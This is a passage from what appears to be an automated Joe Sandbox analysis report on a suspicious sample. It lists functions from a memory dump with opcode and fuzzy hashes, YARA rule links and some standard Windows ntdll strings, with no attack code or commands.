                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction ID: c697f32b4448d22360ed6de1243b9406ddc46b2af5680e28c4322197b8574a9b
                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction Fuzzy Hash: 3DF05E73B51615ABD321AA49DC80F26B3A9AFC5BA0F290065A604AB270C760EC01E7D0
                                  Function 00FA0854 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction ID: 63e5c5188f7f2cd133badd6220b3f367183f9e90633d657622d6afbef3c7959a
                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction Fuzzy Hash: 44F0B4B2610204AFE714DB21CC01F96B3E9EF99350F1580789545D71A0FAB4DE01E658
                                  Function 00FFC912 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a0fc8abddc6be8ef0e3e2bbd5da701c1a5fafdb3389abf6b701e3b3e561fbea
                                  • Instruction ID: 7bcb1f48ea92f4920eb57d2f64723f37294ab21119b3e8a27e2dffdb1e031384
                                  • Opcode Fuzzy Hash: 5a0fc8abddc6be8ef0e3e2bbd5da701c1a5fafdb3389abf6b701e3b3e561fbea
                                  • Instruction Fuzzy Hash: 82F0A470A0120CDFCB14EF65C511AAEB7B4EF04700F008055B945EB395DA78EA01DB90
                                  Function 00F747FB Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41bce817e107f6df01665431388043164620fa1bf3669e508a4d393d503a6eb1
                                  • Instruction ID: 4390f965ccb107291b27f9159bdf70d67315e640455620053e0d6672ad6a6f46
                                  • Opcode Fuzzy Hash: 41bce817e107f6df01665431388043164620fa1bf3669e508a4d393d503a6eb1
                                  • Instruction Fuzzy Hash: 2CF0C732C022E88ED7328A288444B65B788AB02730F1CC96BD89D83102C324EC80E603
                                  Function 01030115 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8d5f65ad6e9ea243b45b9f3985973b80b65642e8eb9a4e3231b6d5e04f2965a
                                  • Instruction ID: 79c75ca46d447b4ed2300e7cf100dba67b77b138494c7ce188de3ddc9102af67
                                  • Opcode Fuzzy Hash: d8d5f65ad6e9ea243b45b9f3985973b80b65642e8eb9a4e3231b6d5e04f2965a
                                  • Instruction Fuzzy Hash: B4F0203641B6951ADF726B2CB8A02D12BACA782510F1910C9ECE0A721EC57B8883C370
                                  Function 00FAC5ED Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f5c650044d3c4bf999332187811012d04a9ccfd88c317ab5f97d8bb4eef89cf
                                  • Instruction ID: b1880963cf30a75eb18c45dd26ce785662fb26f38a04b91c6ab656effbfa20ce
                                  • Opcode Fuzzy Hash: 3f5c650044d3c4bf999332187811012d04a9ccfd88c317ab5f97d8bb4eef89cf
                                  • Instruction Fuzzy Hash: BBF0B8F29116909BD322DB18C148BA1B7E8AB46BB0F189526D80A87712C264CC80EAD0
                                  Function 00FB2619 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction ID: c43c4bc7179ff15f149adc411d6a39fafffdba3ebe124819fec29661763ec916
                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction Fuzzy Hash: 2BE0D832300A002BD712AE5ACCC1F87776EEFC2B10F040079B5045F252CAE6DD099AA4
                                  Function 01006030 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction ID: 516c6a0bb36bbb5052efc3c56dd485d8972f3b4a5a0e9aaf3054312a92e09759
                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction Fuzzy Hash: FAF08C721442049FF3228F09D840B57B7F9EB05364F01C065F6088B1A1D33AEC50CBA0
                                  Function 00F70710 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction ID: 0c0d47911090a5c6d4f6e577159e8626e866284517c7a1144d00ed97eff4eb4d
                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction Fuzzy Hash: C3F0ED3A204395DBDB19DF19D040BE5BBA8EF55360B10409AE84A8B351EB35FD82EB81
                                  Function 00FA49D0 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction ID: e772814120855e1c41cfeaf99cb58807e7f49642a1c76b0ccccd99adbba8f85b
                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction Fuzzy Hash: 5DE09273684546ABC3212E55CC01B6676A59BD27A0F150429E1019B150DBB8EC40F798
                                  Function 0101678E Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction ID: 4983a6de58360056ca589d5acace86e56a2f2fc538afc46e05c635dec16347d0
                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction Fuzzy Hash: E2E02672A01110FBDB21A799CD02F9BBEBCEB80FA0F050054B600E70D4E5B5EE00D6D0
                                  Function 010408C0 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                  • Instruction ID: 3a005a240ab20f456a021a64279f2f232dc37dead7359e5ccd138e42c3930283
                                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                  • Instruction Fuzzy Hash: EBE02B716403458BDB208A2DC280AD3B7E8DF95620F1480BDEEC417202C230F842C6D0
                                  Function 00F725E0 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8f74d5c7a980b807005c19753901a1a3c04f64f15b48d7c763a3c31beb843973
                                  • Instruction ID: 331ef1dee9d525797edd1c8971f48e5e47e04d2dca470100130dde2698a68e10
                                  • Opcode Fuzzy Hash: 8f74d5c7a980b807005c19753901a1a3c04f64f15b48d7c763a3c31beb843973
                                  • Instruction Fuzzy Hash: 9EE092721005549BC722BF29DD02F8B77EAEB94760F018516F159571A1CB39AD10D784
                                  Function 0102A456 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                  • Instruction ID: 8e7e9fae5b680aee38bc402528fbeeedc63c76f611378cf53d1372928e11978e
                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                  • Instruction Fuzzy Hash: 1AE06D31010620DFEB766B2ADC09B92BBE0AF80711F148868F1D6128B1CB78D880DA40
                                  Function 00FF4000 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction ID: f3c2fe9cf6a59a41ee4ee1f6085cecef8709a2fa7b924a74ebd79e9f0a134183
                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction Fuzzy Hash: F2E0AE347002098BD715CF19C040B6277A6BFD5B20F28C068AA488F205EB32A8429A40
                                  Function 00FACA38 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f26dd94a9b88c5de6f0577c3c4780141cc4d098df9fa56a89ad4a920fa4f8bf
                                  • Instruction ID: 9978fd92e5cc26eae86d54462140118cf0f50fdb527ac3a415a6cdc7857b0d13
                                  • Opcode Fuzzy Hash: 6f26dd94a9b88c5de6f0577c3c4780141cc4d098df9fa56a89ad4a920fa4f8bf
                                  • Instruction Fuzzy Hash: 19D0C7728850286ECB74E228BC28FA33A9DAB42B20F024860F20892020D92CCC81B2C4
                                  Function 00F6823B Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction ID: e24e98c5c608f542f0bd92e749a2a15434350310e13be3694e13130676ed7b2b
                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction Fuzzy Hash: EEE08632440510DFDB312E11DC12F9176A1FB94B60F20492DF041160658B745C82FB44
                                  Function 00F72050 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9dc0b9ad6201289bbbafcea8601b618ec1d6ff0d66bb2ea0f3143a5707d0fbfd
                                  • Instruction ID: 18739392821e778d39ad7b848ce3e72e3d773db2bc744bd017d786fd12a0961e
                                  • Opcode Fuzzy Hash: 9dc0b9ad6201289bbbafcea8601b618ec1d6ff0d66bb2ea0f3143a5707d0fbfd
                                  • Instruction Fuzzy Hash: 7EE08C321004506BC311FA5DED02E8A73EAEB95760F008122F154972A1CB69AD00D794
                                  Function 00FA8A90 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction ID: bf1d91bfc5cadeb52a160d211d36f0ecfce6d25bf677d56b8113571c200cedd8
                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction Fuzzy Hash: 54E02673110A0497C328EE18C411B7273A4EF45730F08423EA51347380C934E804D794
                                  Function 00FC6AA4 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction ID: 127826dc828ade284bd9733b831d1b6f1576dc8a1d2c45c76727c0c8903e8637
                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction Fuzzy Hash: BFD05E36511A50AFC3329F1BEE01D53BBF9FBC5F20705062EA44693920C675AC06DBA0
                                  Function 00FAE59C Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction ID: 5251e282e97c0753ce549a77d679912a6ca153470604fefa85fce7409f84d672
                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction Fuzzy Hash: 6FD0A932A08660ABDB32AA1CFC00FC333E9AB88B20F060459B008C7160C3A4AC81DA84
                                  Function 00FEE908 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction ID: ff90cbf2c90452be4d5617f1b6c1c961014ef9ca7bd4134aa9b747861fd61a7c
                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction Fuzzy Hash: 80E0EC759506849BCF12EF59EA41F5EB7F9BB85B50F150054A0086B662C628AD00DB40
                                  Function 00F6A0E3 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction ID: bb942951e78d03659cd6211df682a8da6ac66f1aa73cd98748ec9d27afc29c44
                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction Fuzzy Hash: 4CD01233616070A7CB2966656D14FA779559B82BA4F1A006D780AB3910C5198C42FAE1
                                  Function 00FAA830 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction ID: 6ccd74eb80589b80fdc6eac700927d29733241298fa78fbcf2cab3f6b2f0be5f
                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction Fuzzy Hash: C9D012771D054CBBCB11AF65DC02F957BA9E755BA0F444020B504875A1C63AE950D684
                                  Function 00FACA24 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 291fcf5fb16e48ccd542971811100acbe01f543056c9bb0bd80f976e856a5407
                                  • Instruction ID: ace091a7c32a31d39d27ea6c814642a88507b5baac52e17c6f7b2b33b7d0f06c
                                  • Opcode Fuzzy Hash: 291fcf5fb16e48ccd542971811100acbe01f543056c9bb0bd80f976e856a5407
                                  • Instruction Fuzzy Hash: 2BD0A775901446CBCF16EF05C925E7E36B0EB14780B400068F60051170D72DDC02F740
                                  Function 00F802A0 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction ID: 07bc3ab2d4943e5df7beb9e902946e6062a7d57097f66f9a647d93206eeb4c54
                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction Fuzzy Hash: 27D09235612A80CFC65A8B08C5A9B5533A4BB44B44FC504A0E401CBB61DA68E944DA00
                                  Function 00FAC700 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction ID: 7bd1d72aae6e16c2b903a27439403c1f7f86a8ee32d6fc3f3ae043e0f9b330ae
                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction Fuzzy Hash: DAC01232290648AFC712AA98DD02F427BA9EB98B40F000021F2048B671C635E920EA84
                                  Function 00F90310 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction ID: 5ce0f3d3b197473fe25212292d7614164be1b0149d1f09c9e4408cbe79f75d9c
                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction Fuzzy Hash: 20D01236100248EFCB01DF41C890D9A772AFBC8710F508019FD1907611CA35ED62DA50
                                  Function 00F70750 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction ID: 1002cbe19735b7ac597ce781fc831a44117540e36f9eb93316ce0e23e910baca
                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction Fuzzy Hash: 4AC04C757015458FCF15DB19D795F4577E4F744750F150890E805CB721E724FD01DA10
                                  Function 00FB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: f613c33047d7e8eb691e4f27baba3f80aa65e979f933c5e8936f41d89b16af3b
                                  • Instruction ID: 245f6642269519c87b6b7cbcc7c73a8eab5e1efcef675673f676d8c30fd94344
                                  • Opcode Fuzzy Hash: f613c33047d7e8eb691e4f27baba3f80aa65e979f933c5e8936f41d89b16af3b
                                  • Instruction Fuzzy Hash: 9651EBB6E00256BFCB50DF598D90ABEF7B8BB08300B148169E469D7641D734DE40BBE1
                                  Function 01022410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 49ad388c0e6f3209f9189e3822ab370a9ac3874a8157392e1be4b053c0f49320
                                  • Instruction ID: ea8acfc22463307e705f8a409d0b96ce5c9192de374661a98cfa410ef0686f37
                                  • Opcode Fuzzy Hash: 49ad388c0e6f3209f9189e3822ab370a9ac3874a8157392e1be4b053c0f49320
                                  • Instruction Fuzzy Hash: D151F571A00665AFDB71DEDCC99097EBBF8AF44200B448859E4D6C7682DA74DA409760
                                  Function 00FA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FE46FC
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FE4742
                                  • ExecuteOptions, xrefs: 00FE46A0
                                  • Execute=1, xrefs: 00FE4713
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FE4655
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FE4725
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FE4787
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_f40000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: b32c77b95396002c14e5a844dc284018967bf799896ec73deb6928623df382b5
                                  • Instruction ID: c13f74d64dd3de92939a07a8f39fbc991cacdc1d50affbf0a8e72643d8cd29f4
                                  • Opcode Fuzzy Hash: b32c77b95396002c14e5a844dc284018967bf799896ec73deb6928623df382b5
